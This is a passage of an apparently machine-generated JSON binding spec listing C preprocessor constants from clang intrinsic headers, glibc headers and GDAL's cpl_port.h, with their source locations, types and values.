0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:57:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_MM_ROUND_UP", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2952:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16384 }, { "tag": "const", "name": "_MM_ROUND_DOWN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2951:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8192 }, { "tag": "const", "name": "_MM_ROUND_NEAREST", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2950:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_EXCEPT_INEXACT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2939:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_MM_MASK_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2948:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8064 }, { "tag": "const", "name": "_MM_MASK_INEXACT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2947:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "_MM_MASK_UNDERFLOW", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2946:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "_MM_MASK_OVERFLOW", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2945:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1024 }, { "tag": "const", "name": "_MM_MASK_DIV_ZERO", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2944:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "_MM_MASK_DENORM", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2943:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 256 }, { "tag": "const", "name": "_MM_MASK_INVALID", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2942:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 128 }, { "tag": "const", "name": "_MM_EXCEPT_MASK", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2940:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 63 }, { "tag": "const", "name": "CPL_RESTRICT", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:969:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_RETURNS_NONNULL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:961:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_FALLTHROUGH", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1058:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "HAVE_GCC_SYSTEM_HEADER", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1053:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "HAVE_GCC_DIAGNOSTIC_PUSH", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1049:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_NULL_TERMINATED", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:893:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_UNUSED", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:936:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_NO_RETURN", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:945:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_WARN_UNUSED_RESULT", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:928:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_NOSANITIZE_UNSIGNED_INT_OVERFLOW", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1160:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_ERROR_H_INCLUDED", "ns": 0, "location": "/usr/include/gdal/cpl_error.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_NULLPTR", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1170:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "VOLATILE_BOOL", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1155:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "FALSE", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1147:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "TRUE", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:1151:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__CLANG_MAX_ALIGN_T_DEFINED", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/__stddef_max_align_t.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_PTRDIFF_T", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stddef.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__itimerspec_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_itimerspec.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "TIME_UTC", "ns": 0, "location": "/usr/include/time.h:65:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "INCLUDED_CPL_CONFIG_EXTRAS", "ns": 0, "location": "/usr/include/gdal/cpl_config_extras.h:4:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_RECODE_ICONV", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:106:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CPL_RECODE_STUB", "ns": 0, "location": "/usr/include/gdal/cpl_port.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "CLOCK_MONOTONIC_COARSE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:58:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "CLOCK_REALTIME_COARSE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:56:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "CLOCK_REALTIME_ALARM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:62:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "CLOCK_BOOTTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:60:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "CLOCK_TAI", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:66:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 11 }, { "tag": "const", "name": "CLOCK_BOOTTIME_ALARM", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:64:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "__struct_tm_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_tm.h:2:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "TIMER_ABSTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:69:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_TIME_H", "ns": 0, "location": "/usr/include/time.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CLOCK_REALTIME", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:46:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_BITS_TIME_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CLOCKS_PER_SEC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:34:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1000000 }, { "tag": "const", "name": "CLOCK_PROCESS_CPUTIME_ID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:50:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "CLOCK_MONOTONIC", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:48:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CLOCK_MONOTONIC_RAW", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:54:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "CLOCK_THREAD_CPUTIME_ID", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/time.h:52:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "__USE_XOPEN2K8", "ns": 0, "location": "/usr/include/features.h:325:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "USHRT_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 65535 }, { "tag": "const", "name": "INT_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -2147483648 }, { "tag": "const", "name": "INT_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:46:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483647 }, { "tag": "const", "name": "LONG_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:52:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -9223372036854775808 }, { "tag": "const", "name": "UINT_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:56:9", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 }, "value": 4294967295 }, { "tag": "const", "name": "ULONG_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:57:9", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 }, "value": 18446744073709551615 }, { "tag": "const", "name": "CHAR_BIT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "CHAR_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -128 }, { "tag": "const", "name": "__USE_ATFILE", "ns": 0, "location": "/usr/include/features.h:373:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_MISC", "ns": 0, "location": "/usr/include/features.h:369:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "CHAR_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:70:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 127 }, { "tag": "const", "name": "EXPR_NEST_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:78:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "__USE_FORTIFY_LEVEL", "ns": 0, "location": "/usr/include/features.h:388:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "LINE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:81:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "CHARCLASS_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:84:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "__GLIBC_USE_DEPRECATED_GETS", "ns": 0, "location": "/usr/include/features.h:396:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__KERNEL_STRICT_NAMES", "ns": 0, "location": "/usr/include/features.h:148:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "RE_DUP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:88:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32767 }, { "tag": "const", "name": "SCHAR_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:49:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -128 }, { "tag": "const", "name": "__GLIBC_USE_DEPRECATED_SCANF", "ns": 0, "location": "/usr/include/features.h:419:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "SCHAR_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 127 }, { "tag": "const", "name": "SHRT_MIN", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:50:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -32768 }, { "tag": "const", "name": "UCHAR_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:54:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "SHRT_MAX", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/limits.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32767 }, { "tag": "const", "name": "_POSIX2_EXPR_NEST_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_POSIX2_LINE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:47:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "_POSIX2_RE_DUP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:51:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "_POSIX2_CHARCLASS_NAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:55:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 14 }, { "tag": "const", "name": "_FEATURES_H", "ns": 0, "location": "/usr/include/features.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "BC_BASE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:63:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "_STDIO_H", "ns": 0, "location": "/usr/include/stdio.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "BC_DIM_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:66:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "__USE_ISOC11", "ns": 0, "location": "/usr/include/features.h:228:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "BC_SCALE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "__USE_ISOC95", "ns": 0, "location": "/usr/include/features.h:319:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "BC_STRING_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:72:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1000 }, { "tag": "const", "name": "COLL_WEIGHTS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:75:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 255 }, { "tag": "const", "name": "__USE_ISOC99", "ns": 0, "location": "/usr/include/features.h:321:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_POSIX", "ns": 0, "location": "/usr/include/features.h:301:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_POSIX199309", "ns": 0, "location": "/usr/include/features.h:309:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_POSIX2", "ns": 0, "location": "/usr/include/features.h:305:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_POSIX199506", "ns": 0, "location": "/usr/include/features.h:313:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_XOPEN2K", "ns": 0, "location": "/usr/include/features.h:317:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_STDC_PREDEF_H", "ns": 0, "location": "/usr/include/stdc-predef.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__STDC_IEC_559__", "ns": 0, "location": "/usr/include/stdc-predef.h:41:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__STDC_IEC_559_COMPLEX__", "ns": 0, "location": "/usr/include/stdc-predef.h:49:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_DEFAULT_SOURCE", "ns": 0, "location": "/usr/include/features.h:222:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__USE_POSIX_IMPLICITLY", "ns": 0, "location": "/usr/include/features.h:261:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_SOURCE", "ns": 0, "location": "/usr/include/features.h:264:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX_C_SOURCE", "ns": 0, "location": "/usr/include/features.h:266:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 200809 }, { "tag": "const", "name": "_ATFILE_SOURCE", "ns": 0, "location": "/usr/include/features.h:327:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__AVX512PFINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512pfintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_STDLIB_H", "ns": 0, "location": "/usr/include/stdlib.h:35:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_WCHAR_T", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/stddef.h:69:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__MWAITXINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/mwaitxintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__CLZEROINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/clzerointrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__LWPINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lwpintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512BF16INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bf16intrin.h:14:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__always_inline", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:319:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__off_t_defined", "ns": 0, "location": "/usr/include/stdio.h:67:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_VA_LIST_DEFINED", "ns": 0, "location": "/usr/include/stdio.h:53:12", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_IO_USER_LOCK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:117:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32768 }, { "tag": "const", "name": "__attribute_artificial__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:330:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__attribute_warn_unused_result__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:301:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__wur", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:310:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_kand_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8405:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_kandn_mask16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:8406:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "stdin", "ns": 0, "location": "/usr/include/stdio.h:141:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "FOPEN_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:37:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "L_ctermid", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:30:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 9 }, { "tag": "const", "name": "FILENAME_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4096 }, { "tag": "const", "name": "__WORDSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/wordsize.h:4:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 64 }, { "tag": "const", "name": "TMP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 238328 }, { "tag": "const", "name": "L_tmpnam", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 20 }, { "tag": "const", "name": "_BITS_STDIO_LIM_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "P_tmpdir", "ns": 0, "location": "/usr/include/stdio.h:120:10", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, "value": "/tmp" }, { "tag": "const", "name": "__attribute_nonstring__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:431:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "SEEK_END", "ns": 0, "location": "/usr/include/stdio.h:111:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "SEEK_CUR", "ns": 0, "location": "/usr/include/stdio.h:110:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__restrict_arr", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:387:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "SEEK_SET", "ns": 0, "location": "/usr/include/stdio.h:109:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "EOF", "ns": 0, "location": "/usr/include/stdio.h:104:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "BUFSIZ", "ns": 0, "location": "/usr/include/stdio.h:99:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8192 }, { "tag": "const", "name": "_IONBF", "ns": 0, "location": "/usr/include/stdio.h:95:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_IOLBF", "ns": 0, "location": "/usr/include/stdio.h:94:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_IOFBF", "ns": 0, "location": "/usr/include/stdio.h:93:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_mm512_setzero_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:178:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__extern_inline", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:346:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__ssize_t_defined", "ns": 0, "location": "/usr/include/stdio.h:78:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__fortify_function", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:356:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__extern_always_inline", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/cdefs.h:347:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__GLIBC_USE_IEC_60559_TYPES_EXT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h:69:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__GLIBC_USE_IEC_60559_FUNCS_EXT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h:60:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__GLIBC_USE_IEC_60559_BFP_EXT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h:51:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "__GLIBC_USE_LIB_EXT2", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h:42:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "____FILE_defined", "ns": 0, "location": 